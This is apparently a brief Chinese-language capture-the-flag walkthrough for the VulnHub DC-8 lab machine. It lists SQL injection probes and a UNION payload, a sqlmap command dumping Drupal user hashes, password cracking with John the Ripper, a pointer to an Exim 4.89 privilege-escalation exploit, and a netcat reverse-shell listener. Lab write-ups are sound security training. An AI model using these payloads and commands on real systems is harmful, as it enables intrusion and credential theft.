镜像下载链接:
https://www.vulnhub.com/entry/dc-8,367/#download
主机扫描:
http://10.10.202.131/?nid=2%27
http://10.10.202.131/?nid=2%20and%201=2 # false
http://10.10.202.131/?nid=2%20and%201=1 # true
http://10.10.202.131/?nid=-2+union+select++(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))+
╰─ sqlmap -u "http://10.10.202.131/?nid=1" --dbs --batch -D d7db -T users -C name,pass,init --dump
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | dc8blah@dc8blah.org |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | john@blahsdfsfd.org |
# john --wordlist=/usr/share/wordlists/rockyou.txt druphsh
john/turtle
进行提权操作:
google: exim 4.89 privilege escalation
https://www.exploit-db.com/exploits/46996
nc -lvvp 4444
OVER!